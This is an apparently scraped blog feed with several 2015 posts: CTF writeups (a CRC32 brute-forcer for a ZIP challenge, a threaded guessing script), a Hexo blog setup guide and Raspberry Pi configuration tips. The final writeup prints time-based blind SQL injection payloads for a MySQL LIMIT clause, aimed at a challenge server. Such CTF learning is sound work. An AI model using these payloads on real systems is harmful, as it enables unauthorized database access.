class="string">'%d is not psd'</span> %i</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">print</span> <span class="string">'%d is the psd'</span> %i</span><br><span class="line"> flag = <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="comment"># print html</span></span><br><span class="line"> <span class="comment"># print match</span></span><br><span class="line"> <span class="keyword">print</span> <span class="string">"current has %d threads"</span> % (threading.activeCount() - <span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">global</span> flag</span><br><span class="line">flag = <span class="number">0</span></span><br><span class="line">t1 = threading.Thread(target = run, args = (<span class="number">500000</span>,<span class="number">600000</span>))</span><br><span class="line">t2 = threading.Thread(target = run, args = (<span class="number">600000</span>,<span class="number">700000</span>))</span><br><span class="line">t3 = threading.Thread(target = run, args = (<span class="number">700000</span>,<span class="number">800000</span>))</span><br><span class="line">t4 = threading.Thread(target = run, args = (<span class="number">800000</span>,<span class="number">900000</span>))</span><br><span class="line">t5 = threading.Thread(target = run, args = (<span class="number">900000</span>,<span class="number">1000000</span>))</span><br><span class="line">t1.start()</span><br><span class="line">t2.start()</span><br><span class="line">t3.start()</span><br><span class="line">t4.start()</span><br><span class="line">t5.start()</span><br><span class="line"><span class="comment"># for i in range(5):</span></span><br><span class="line"><span class="comment"># t3 = threading.Thread(target = run, args=(500000,600000))</span></span><br><span class="line"><span class="comment"># t3.start()</span></span><br></pre></td></tr></table></figure>
<h3 id="Problem_ID:18">Problem ID:18</h3><h3 id="听说你们想玩其他类型的题目?">听说你们想玩其他类型的题目?</h3><p>一道之前bkpctf的一道题的弱化版,叫做punch。明天有空可以把那个题写一下贴出来,就这道题而言直接查表就好了。可以看下这个虚拟的<a href="http://www.masswerk.at/keypunch/" target="_blank" rel="external">打印机</a>。<br><img src="http://edwardl.qiniudn.com/123.png" alt=""></p>
<h3 id="Problem_ID:19">Problem ID:19</h3><h3 id="上面那个太简单了">上面那个太简单了</h3><p>这次给了一个压缩包,可以看见很短的长度和crc,所以可能是通过爆破来解题,查了一下资料,写了个脚本开始爆破。<br><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><span class="line">#<span class="keyword">include</span> <windows.<span class="keyword">h</span>></span><br><span class="line">#<span class="keyword">include</span> <stdio.<span class="keyword">h</span>></span><br><span class="line"><span class="comment">//crc32.h</span></span><br><span class="line">#ifndef _CRC32_H</span><br><span class="line">#define _CRC32_H</span><br><span class="line"> </span><br><span class="line">UINT crc32( UCHAR *buf, int len);</span><br><span class="line"> </span><br><span class="line">#endif</span><br><span class="line"> </span><br><span class="line">static UINT CRC32[256];</span><br><span class="line">static <span class="keyword">char</span> init = 0;</span><br><span class="line"> </span><br><span class="line">static void init_table()</span><br><span class="line">{</span><br><span class="line"> int i,j;</span><br><span class="line"> UINT <span class="keyword">crc</span>;</span><br><span class="line"> <span class="keyword">for</span>(i = 0;i < 256;i++)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">crc</span> = i;</span><br><span class="line"> <span class="keyword">for</span>(j = 0;j < 8;j++)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">crc</span> & 1)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">crc</span> = (<span class="keyword">crc</span> >> 1) ^ 0xEDB88320;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">crc</span> = <span class="keyword">crc</span> >> 1;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> CRC32[i] = <span class="keyword">crc</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="comment">//crc32</span></span><br><span class="line">UINT crc32( UCHAR *buf, int len)</span><br><span class="line">{</span><br><span class="line"> UINT <span class="keyword">ret</span> = 0xFFFFFFFF;</span><br><span class="line"> int i;</span><br><span class="line"> <span class="keyword">if</span>( !init )</span><br><span class="line"> {</span><br><span class="line"> init_table();</span><br><span class="line"> init = 1;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">for</span>(i = 0; i < len;i++)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">ret</span> = CRC32[((<span class="keyword">ret</span> & 0xFF) ^ buf[i])] ^ (<span class="keyword">ret</span> >> 8);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">ret</span> = ~<span class="keyword">ret</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">ret</span>;</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line">int main()</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">char</span> ss[]=<span class="string">"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_! "</span>;</span><br><span class="line"> <span class="keyword">char</span> sss[6]={0};</span><br><span class="line"> int a,b,c,<span class="keyword">d</span>,<span class="keyword">e</span>;</span><br><span class="line"> </span><br><span class="line"> int _crc32 = 0;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">for</span>(a=0; a<<span class="literal">strlen</span>(ss); a++)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">for</span>(b=0; b<<span class="literal">strlen</span>(ss); b++)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">for</span>(c=0; c<<span class="literal">strlen</span>(ss); c++)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">d</span>=0; <span class="keyword">d</span><<span class="literal">strlen</span>(ss); <span class="keyword">d</span>++)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">e</span>=0; <span class="keyword">e</span><<span class="literal">strlen</span>(ss); <span class="keyword">e</span>++)</span><br><span class="line"> {</span><br><span class="line"> sss[0] = ss[a];</span><br><span class="line"> sss[1] = ss[b];</span><br><span class="line"> sss[2] = ss[c];</span><br><span class="line"> sss[3] = ss[<span class="keyword">d</span>];</span><br><span class="line"> sss[4] = ss[<span class="keyword">e</span>];</span><br><span class="line"> </span><br><span class="line"> _crc32 = crc32((UCHAR *)sss, 5);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(_crc32 == 0xF30BDD6C)</span><br><span class="line"> {</span><br><span class="line"> printf(<span class="string">"%s\n"</span>, sss);</span><br><span class="line"> <span class="comment">//system("PAUSE");</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> 0;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>这里还有个坑,这里hash碰撞了,第二部分,有两个一样的crc,一个是IYF35,一个是9e76e,一开始为了节省时间,读到第一个符合的crc之后就停止了,导致一直不对,后来跑全了拿到了第二个,提交,对了。</p>
]]></content>
<summary type="html">
<![CDATA[<h3 id="Problem_ID:17">Problem ID:17</h3><h3 id="EasyUser">EasyUser</h3><p>一看就是一个爆破验证码的题目,然后就开始写脚本<br>]]>
</summary>
<category term="crc" scheme="http://edward-l.github.io/tags/crc/"/>
<category term="hduisa_ctf" scheme="http://edward-l.github.io/tags/hduisa-ctf/"/>
<category term="punch" scheme="http://edward-l.github.io/tags/punch/"/>
<category term="python" scheme="http://edward-l.github.io/tags/python/"/>
<category term="threading" scheme="http://edward-l.github.io/tags/threading/"/>
<category term="writeup" scheme="http://edward-l.github.io/categories/writeup/"/>
</entry>
<entry>
<title><![CDATA[hexo 安装&配置]]></title>
<link href="http://edward-l.github.io/2015/03/14/hexo%20%E5%AE%89%E8%A3%85&%E9%85%8D%E7%BD%AE/"/>
<id>http://edward-l.github.io/2015/03/14/hexo 安装&配置/</id>
<published>2015-03-14T13:30:16.000Z</published>
<updated>2015-03-14T17:34:56.000Z</updated>
<content type="html"><![CDATA[<p>MAC升级系统之后很多东西都没有了,hexo也出现了各种奇奇怪怪的问题,索性全部重新安装过了一遍,简单记录下安装搭建hexo的过程。<br><a id="more"></a></p>
<h2 id="安装nodejs">安装nodejs</h2><pre>brew install node</pre>
<h2 id="安装hexo">安装hexo</h2><pre>npm install -g hexo</pre>
##创建blog文件夹
创建一个blog文件夹,并在这个文件夹新建所有blog所需要的文件
<pre>
mkdir blog
hexo init
</pre>
<h2 id="安装依赖包">安装依赖包</h2><pre>npm install</pre>
<h2 id="本地查看">本地查看</h2><pre>
hexo g
hexo s
</pre>
<h2 id="部署到github">部署到github</h2><h3 id="在github创建一个和你github用户名一样的项目">在github创建一个和你github用户名一样的项目</h3><h3 id="检查添加ssh_key">检查添加ssh key</h3><p>检查SSH keys的设置</p>
<pre>cd ~/.ssh 检查本机的ssh密钥</pre>
如果提示:'No such file or directory' 说明你是第一次使用git,那就生成新的ssh key
###生成ssh key
<pre>
$ ssh-keygen -t rsa -C "邮件地址@youremail.com"
Generating public/private rsa key pair.
Enter file in which to save the key (/Users/your_user_directory/.ssh/id_rsa):<回车就好>
</回车就好></pre>
<h3 id="添加SSH_Key到GitHub">添加SSH Key到GitHub</h3><p>登陆github,Account Settings—->SSH Public keys —-> add another public keys</p>
<pre>cat /Users/Edward_L/.ssh/id_rsa.pub</pre>
把这个密钥添加进去就好了
###测试
<pre>$ ssh -T git@github.com</pre>
看到'Hi cnfeat! You've successfully authenticated, but GitHub does not provide shell access.'这个就好了~
### 设置用户信息
<pre>
$ git config --global user.name "cnfeat"//用户名
$ git config --global user.email "cnfeat@gmail.com"//填写自己的邮箱
</pre>
<h3 id="将独立域名与GitHub_Pages的空间绑定">将独立域名与GitHub Pages的空间绑定</h3><p>在source中新建一个名为CNAME的文本文件,里面写入你要绑定的域名,例如</p>
<pre>
EdwardL.xyz
www.EdwardL.xyz
</pre>
<h3 id="高级进阶-关于_config-yml的设置">高级进阶-关于_config.yml的设置</h3><p>下面是我的blog配置</p>
<pre>
# Hexo Configuration
## Docs: http://hexo.io/docs/configuration.html
## Source: https://github.com/hexojs/hexo/
# Site
title: Edward_L's Blog
subtitle: 活着就是为了折腾
description:
author: Edward_L
email: linzhexi777@gmail.com
language:
# URL
## If your site is put in a subdirectory, set url as 'http://yoursite.com/child' and root as '/child/'
url: http://edward-l.github.io/
root: /
permalink: :year/:month/:day/:title/
tag_dir: tags
archive_dir: archives
category_dir: categories
code_dir: downloads/code
permalink_defaults:
# Directory
source_dir: source
public_dir: public
# Writing
new_post_name: :title.md # File name of new posts
default_layout: post
titlecase: false # Transform title into titlecase
external_link: true # Open external links in new tab
filename_case: 0
render_drafts: false
post_asset_folder: false
relative_link: false
highlight:
enable: true
line_number: true
tab_replace:
# Category & Tag
default_category: uncategorized
category_map:
tag_map:
# Archives
## 2: Enable pagination
## 1: Disable pagination
## 0: Fully Disable
archive: 1
category: 2
tag: 2
# Server
## Hexo uses Connect as a server
## You can customize the logger format as defined in
## http://www.senchalabs.org/connect/logger.html
port: 4000
server_ip: localhost
logger: false
logger_format: dev
# Date / Time format
## Hexo uses Moment.js to parse and display date
## You can customize the date format as defined in
## http://momentjs.com/docs/#/displaying/format/
date_format: MMM D YYYY
time_format: H:mm:ss
# Pagination
## Set per_page to 0 to disable pagination
per_page: 0
pagination_dir: page
# Disqus
disqus_shortname:
# Extensions
## Plugins: https://github.com/hexojs/hexo/wiki/Plugins
## Themes: https://github.com/hexojs/hexo/wiki/Themes
theme: landscape-plus
exclude_generator:
# Deployment
## Docs: http://hexo.io/docs/deployment.html
deploy:
type: git
repository: https://github.com/Edward-L/Edward-L.github.io.git
branch: master
</pre>
<p>下面是我主题的_config.yml的配置文件</p>
<pre>
# Header
menu:
Home: /
Archives: /archives
#rss: /atom.xml
About me: /about-me
# Content
excerpt_link: Read More
fancybox: flase
# Sidebar
sidebar: right
widgets:
- category
- tag
- tagcloud
- archive
- recent_posts
- links
# Links
links:
Old_Blog_Diandian : http://linzhexi.diandian.com/
# Miscellaneous
google_analytics: UA-56285224-2
favicon: /favicon.png
twitter:
google_plus:
fb_admins:
fb_app_id:
# Duoshuo
duoshuo_shortname: edward7l
# Baidu share
baidushare: true
</pre>
<h3 id="问题和解决">问题和解决</h3><p>1.在安装各种东西的时候遇到报错,请首先考虑是否以管理员的权限运行。<br>2.hexo 2.x和3.x有一个区别,2.x 的blog的_config中deploy的type是github,而在3.x中要把type改成git,并运行</p>
<pre>npm install hexo-deployer-git</pre>]]></content>
<summary type="html">
<![CDATA[<p>MAC升级系统之后很多东西都没有了,hexo也出现了各种奇奇怪怪的问题,索性全部重新安装过了一遍,简单记录下安装搭建hexo的过程。<br>]]>
</summary>
<category term="hexo" scheme="http://edward-l.github.io/tags/hexo/"/>
<category term="za" scheme="http://edward-l.github.io/categories/za/"/>
</entry>
<entry>
<title><![CDATA[raspbian pi 配置&技巧]]></title>
<link href="http://edward-l.github.io/2015/03/13/raspbian%20pi%20%E9%85%8D%E7%BD%AE&%E6%8A%80%E5%B7%A7/"/>
<id>http://edward-l.github.io/2015/03/13/raspbian pi 配置&技巧/</id>
<published>2015-03-13T07:30:16.000Z</published>
<updated>2015-03-19T10:15:06.000Z</updated>
<content type="html"><![CDATA[<p>拿到了树莓派就开始折腾了。</p>
<h1 id="关于黑屏">关于黑屏</h1><p>一开始就是烧系统了,最先用的是’NOOBS’因为这个不用自己烧,直接下载完放进卡里,树莓派开机就行了,感觉比较快,但是弄完之后显示屏一直处于黑屏状态,换了近十台显示器,HDMI接口都无果,然后就想要不还是自己烧吧,然后就自己下了镜像,和Raspberry-PI-SD-Installer-OS-X-master,开始自己烧,烧完之后,在’/boot/config.txt’中修改,先改成自己电脑屏幕的分辨率之后’reboot’就应该可以了。<br><a id="more"></a><br><strong>CEA分辨率</strong><br>以下是CEA规定的电视规格分辨率。<br>这些分辨率的hdmi_group=1。<br>hdmi_mode=1 VGA<br>hdmi_mode=2 480p 60Hz<br>hdmi_mode=3 480p 60Hz H<br>hdmi_mode=4 720p 60Hz<br>hdmi_mode=5 1080i 60Hz<br>hdmi_mode=6 480i 60Hz<br>hdmi_mode=7 480i 60Hz H<br>hdmi_mode=8 240p 60Hz<br>hdmi_mode=9 240p 60Hz H<br>hdmi_mode=10 480i 60Hz 4x<br>hdmi_mode=11 480i 60Hz 4x H<br>hdmi_mode=12 240p 60Hz 4x<br>hdmi_mode=13 240p 60Hz 4x H<br>hdmi_mode=14 480p 60Hz 2x<br>hdmi_mode=15 480p 60Hz 2x H<br>hdmi_mode=16 1080p 60Hz<br>hdmi_mode=17 576p 50Hz<br>hdmi_mode=18 576p 50Hz H<br>hdmi_mode=19 720p 50Hz<br>hdmi_mode=20 1080i 50Hz<br>hdmi_mode=21 576i 50Hz<br>hdmi_mode=22 576i 50Hz H<br>hdmi_mode=23 288p 50Hz<br>hdmi_mode=24 288p 50Hz H<br>hdmi_mode=25 576i 50Hz 4x<br>hdmi_mode=26 576i 50Hz 4x H<br>hdmi_mode=27 288p 50Hz 4x<br>hdmi_mode=28 288p 50Hz 4x H<br>hdmi_mode=29 576p 50Hz 2x<br>hdmi_mode=30 576p 50Hz 2x H<br>hdmi_mode=31 1080p 50Hz<br>hdmi_mode=32 1080p 24Hz<br>hdmi_mode=33 1080p 25Hz<br>hdmi_mode=34 1080p 30Hz<br>hdmi_mode=35 480p 60Hz 4x<br>hdmi_mode=36 480p 60Hz 4xH<br>hdmi_mode=37 576p 50Hz 4x<br>hdmi_mode=38 576p 50Hz 4x H<br>hdmi_mode=39 1080i 50Hz reduced blanking<br>hdmi_mode=40 1080i 100Hz<br>hdmi_mode=41 720p 100Hz<br>hdmi_mode=42 576p 100Hz<br>hdmi_mode=43 576p 100Hz H<br>hdmi_mode=44 576i 100Hz<br>hdmi_mode=45 576i 100Hz H<br>hdmi_mode=46 1080i 120Hz<br>hdmi_mode=47 720p 120Hz<br>hdmi_mode=48 480p 120Hz<br>hdmi_mode=49 480p 120Hz H<br>hdmi_mode=50 480i 120Hz<br>hdmi_mode=51 480i 120Hz H<br>hdmi_mode=52 576p 200Hz<br>hdmi_mode=53 576p 200Hz H<br>hdmi_mode=54 576i 200Hz<br>hdmi_mode=55 576i 200Hz H<br>hdmi_mode=56 480p 240Hz<br>hdmi_mode=57 480p 240Hz H<br>hdmi_mode=58 480i 240Hz<br>hdmi_mode=59 480i 240Hz H<br>H means 16:9 variant (of a normally 4:3 mode).<br>2x means pixel doubled (i.e. higher clock rate, with each pixel repeated twice)<br>4x means pixel quadrupled (i.e. higher clock rate, with each pixel repeated four times)</p>
<p><strong>DMT分辨率</strong><br>以下是计算机显示器使用的分辨率。<br>这些分辨率的hdmi_group=2。<br>hdmi_mode=1 640x350 85Hz<br>hdmi_mode=2 640x400 85Hz<br>hdmi_mode=3 720x400 85Hz<br>hdmi_mode=4 640x480 60Hz<br>hdmi_mode=5 640x480 72Hz<br>hdmi_mode=6 640x480 75Hz<br>hdmi_mode=7 640x480 85Hz<br>hdmi_mode=8 800x600 56Hz<br>hdmi_mode=9 800x600 60Hz<br>hdmi_mode=10 800x600 72Hz<br>hdmi_mode=11 800x600 75Hz<br>hdmi_mode=12 800x600 85Hz<br>hdmi_mode=13 800x600 120Hz<br>hdmi_mode=14 848x480 60Hz<br>hdmi_mode=15 1024x768 43Hz DO NOT USE<br>hdmi_mode=16 1024x768 60Hz<br>hdmi_mode=17 1024x768 70Hz<br>hdmi_mode=18 1024x768 75Hz<br>hdmi_mode=19 1024x768 85Hz<br>hdmi_mode=20 1024x768 120Hz<br>hdmi_mode=21 1152x864 75Hz<br>hdmi_mode=22 1280x768 reduced blanking<br>hdmi_mode=23 1280x768 60Hz<br>hdmi_mode=24 1280x768 75Hz<br>hdmi_mode=25 1280x768 85Hz<br>hdmi_mode=26 1280x768 120Hz reduced blanking<br>hdmi_mode=27 1280x800 reduced blanking<br>hdmi_mode=28 1280x800 60Hz<br>hdmi_mode=29 1280x800 75Hz<br>hdmi_mode=30 1280x800 85Hz<br>hdmi_mode=31 1280x800 120Hz reduced blanking<br>hdmi_mode=32 1280x960 60Hz<br>hdmi_mode=33 1280x960 85Hz<br>hdmi_mode=34 1280x960 120Hz reduced blanking<br>hdmi_mode=35 1280x1024 60Hz<br>hdmi_mode=36 1280x1024 75Hz<br>hdmi_mode=37 1280x1024 85Hz<br>hdmi_mode=38 1280x1024 120Hz reduced blanking<br>hdmi_mode=39 1360x768 60Hz<br>hdmi_mode=40 1360x768 120Hz reduced blanking<br>hdmi_mode=41 1400x1050 reduced blanking<br>hdmi_mode=42 1400x1050 60Hz<br>hdmi_mode=43 1400x1050 75Hz<br>hdmi_mode=44 1400x1050 85Hz<br>hdmi_mode=45 1400x1050 120Hz reduced blanking<br>hdmi_mode=46 1440x900 reduced blanking<br>hdmi_mode=47 1440x900 60Hz<br>hdmi_mode=48 1440x900 75Hz<br>hdmi_mode=49 1440x900 85Hz<br>hdmi_mode=50 1440x900 120Hz reduced blanking<br>hdmi_mode=51 1600x1200 60Hz<br>hdmi_mode=52 1600x1200 65Hz<br>hdmi_mode=53 1600x1200 70Hz<br>hdmi_mode=54 1600x1200 75Hz<br>hdmi_mode=55 1600x1200 85Hz<br>hdmi_mode=56 1600x1200 120Hz reduced blanking<br>hdmi_mode=57 1680x1050 reduced blanking<br>hdmi_mode=58 1680x1050 60Hz<br>hdmi_mode=59 1680x1050 75Hz<br>hdmi_mode=60 1680x1050 85Hz<br>hdmi_mode=61 1680x1050 120Hz reduced blanking<br>hdmi_mode=62 1792x1344 60Hz<br>hdmi_mode=63 1792x1344 75Hz<br>hdmi_mode=64 1792x1344 120Hz reduced blanking<br>hdmi_mode=65 1856x1392 60Hz<br>hdmi_mode=66 1856x1392 75Hz<br>hdmi_mode=67 1856x1392 120Hz reduced blanking<br>hdmi_mode=68 1920x1200 reduced blanking<br>hdmi_mode=69 1920x1200 60Hz<br>hdmi_mode=70 1920x1200 75Hz<br>hdmi_mode=71 1920x1200 85Hz<br>hdmi_mode=72 1920x1200 120Hz reduced blanking<br>hdmi_mode=73 1920x1440 60Hz<br>hdmi_mode=74 1920x1440 75Hz<br>hdmi_mode=75 1920x1440 120Hz reduced blanking<br>hdmi_mode=76 2560x1600 reduced blanking<br>hdmi_mode=77 2560x1600 60Hz<br>hdmi_mode=78 2560x1600 75Hz<br>hdmi_mode=79 2560x1600 85Hz<br>hdmi_mode=80 2560x1600 120Hz reduced blanking<br>hdmi_mode=81 1366x768 60Hz<br>hdmi_mode=82 1080p 60Hz<br>hdmi_mode=83 1600x900 reduced blanking<br>hdmi_mode=84 2048x1152 reduced blanking<br>hdmi_mode=85 720p 60Hz<br>hdmi_mode=86 1366x768 reduced blanking</p>
<h2 id="关于怎样更加愉快的连接ssh">关于怎样更加愉快的连接ssh</h2><p>毕竟我们大多数的时候还是用ssh连接上去的玩耍的,并不是用屏幕的,所以要怎么样才能更加愉快的链接到ssh呢,下面就是几个小技巧和大家分享啦~首先,让树莓派先记住一个wifi的账号和密码,可以在’/etc/wpa_supplicant/wpa_supplicant.conf’中添加查看已经记忆的wifi账号和密码,你自己也可以记住,这样以后出去的时候快就可以用自己的电脑去放一个和你之前就记住的一样的账号和密码,这样你的树莓派就能够自己连接上去啦,当然现在就是要怎么知道树莓派的局域网IP啦,你当然可以用nmap去扫描这个局域网里的22端口的ip,但是这样是不是太不方便了呢!没关系,你可以自行google<a href="http://shumeipai.nxez.com/2014/03/18/let-raspberry-pi-ip-address-is-automatically-reported-to-the-mailbox.html" target="_blank" rel="external">让树莓派自动上报IP地址到邮箱</a>,当然你可能会遇到一些问题,我也遇到了很多问题!<br>下面就给出一些我遇到的问题的解决方法:<br>首先,最好在send-ip-mail.sh中添加HOME=’/root/‘,然后,如果你遇到账户登陆不了,很有可能是你的邮箱没有开启SMTP等服务,开启就可以了~还有部分邮箱登陆的’auth’不是’login’ 而是’plain’~<br>这样就能够愉快的局域网,又能够及时的知道自己局域网的ip了~可以愉快的ssh之后就能够做很多好玩的事啦~</p>
]]></content>
<summary type="html">
<![CDATA[<p>拿到了树莓派就开始折腾了。</p>
<h1 id="关于黑屏">关于黑屏</h1><p>一开始就是烧系统了,最先用的是’NOOBS’因为这个不用自己烧,直接下载完放进卡里,树莓派开机就行了,感觉比较快,但是弄完之后显示屏一直处于黑屏状态,换了近十台显示器,HDMI接口都无果,然后就想要不还是自己烧吧,然后就自己下了镜像,和Raspberry-PI-SD-Installer-OS-X-master,开始自己烧,烧完之后,在’/boot/config.txt’中修改,先改成自己电脑屏幕的分辨率之后’reboot’就应该可以了。<br>]]>
</summary>
<category term="raspbian pi" scheme="http://edward-l.github.io/tags/raspbian-pi/"/>
<category term="ssh" scheme="http://edward-l.github.io/tags/ssh/"/>
<category term="树莓派" scheme="http://edward-l.github.io/tags/%E6%A0%91%E8%8E%93%E6%B4%BE/"/>
<category term="黑屏" scheme="http://edward-l.github.io/tags/%E9%BB%91%E5%B1%8F/"/>
<category term="raspbian pi" scheme="http://edward-l.github.io/categories/raspbian-pi/"/>
</entry>
<entry>
<title><![CDATA[hduisa_ctf_week2_writeup]]></title>
<link href="http://edward-l.github.io/2015/02/06/hduisa_ctf_week2_writeup/"/>
<id>http://edward-l.github.io/2015/02/06/hduisa_ctf_week2_writeup/</id>
<published>2015-02-05T18:30:16.000Z</published>
<updated>2015-02-07T11:31:38.000Z</updated>
<content type="html"><![CDATA[<h3 id="Problem_ID:7">Problem ID:7</h3><h3 id="颇有技巧的SQL注入">颇有技巧的SQL注入</h3><p>真的是一题让我学到了很多的题目啊。一步一步来,首先为了做这道题,我查看了大概一下的资料:<br><a href="http://www.edwardl.xyz/2015/02/06/SQL%20Injections%20in%20MySQL%20LIMIT%20clause/" target="_blank" rel="external">SQL Injections in MySQL LIMIT clause</a><br><a href="http://lightless.me/archives/MySQL-Injection-Quick-Reference.html" target="_blank" rel="external">MySQL Injection Quick Reference</a><br><a href="http://www.freebuf.com/articles/web/34619.html" target="_blank" rel="external">SQLi Labs 指南 Part 1</a><br><a href="http://www.freebuf.com/articles/web/38315.html" target="_blank" rel="external">SQLi Labs 指南 Part 2</a><br><a href="http://lightless.me/archives/Limit-Injection-Writeup.html" target="_blank" rel="external">hint</a><br><a id="more"></a><br>大概总结下就是一般的步骤为:<br>1.爆数据库的个数<br>2.爆数据库的名字<br>3.爆表的个数<br>4.爆表的名字<br>5.爆表的字段数<br>6.爆表的字段名<br>7.爆表中的内容<br>然后我就开始从hint出发,开始构造payload。开始看了下hint中给出的两个payload,一个是爆数据库的个数的,一个是爆数据库的名字的,但是做到后来才发现,其实这两步在这个题中也不是十分必要的,因为,这道题我们已经在这个数据库中了,后来的payload中不用到数据库的名字也是可以的。然后就是爆表的各个部分了,一开始看了下表的个数,<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://104.236.171.163/week2/limit/?l=1 PROCEDURE analyse((<span class="operator"><span class="keyword">select</span> extractvalue(<span class="keyword">rand</span>(),<span class="keyword">concat</span>(<span class="number">0x3a</span>,(<span class="keyword">IF</span>(<span class="keyword">ORD</span>(<span class="keyword">MID</span>((<span class="keyword">SELECT</span> <span class="keyword">DISTINCT</span>(<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">COUNT</span>(TABLE_NAME) <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)) <span class="keyword">FROM</span> INFORMATION_SCHEMA.<span class="keyword">TABLES</span> <span class="keyword">WHERE</span> TABLE_SCHEMA = <span class="keyword">DATABASE</span>() <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)) = <span class="number">99</span> , <span class="keyword">BENCHMARK</span>(<span class="number">5000000</span>,<span class="keyword">SHA1</span>(<span class="number">1</span>)),<span class="number">1</span>))))),<span class="number">1</span>);</span></span><br></pre></td></tr></table></figure></p>
<p>接下来就是爆表的名字了<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://104.236.171.163/week2/limit/?l=1 PROCEDURE analyse((<span class="operator"><span class="keyword">select</span> extractvalue(<span class="keyword">rand</span>(),<span class="keyword">concat</span>(<span class="number">0x3a</span>,(<span class="keyword">IF</span>(<span class="keyword">ORD</span>(<span class="keyword">MID</span>((<span class="keyword">SELECT</span> <span class="keyword">DISTINCT</span>(<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(table_name <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)) <span class="keyword">FROM</span> INFORMATION_SCHEMA.<span class="keyword">TABLES</span> <span class="keyword">WHERE</span> TABLE_SCHEMA = <span class="keyword">DATABASE</span>() <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)) = <span class="number">99</span> , <span class="keyword">BENCHMARK</span>(<span class="number">5000000</span>,<span class="keyword">SHA1</span>(<span class="number">1</span>)),<span class="number">1</span>))))),<span class="number">1</span>);</span></span><br></pre></td></tr></table></figure></p>
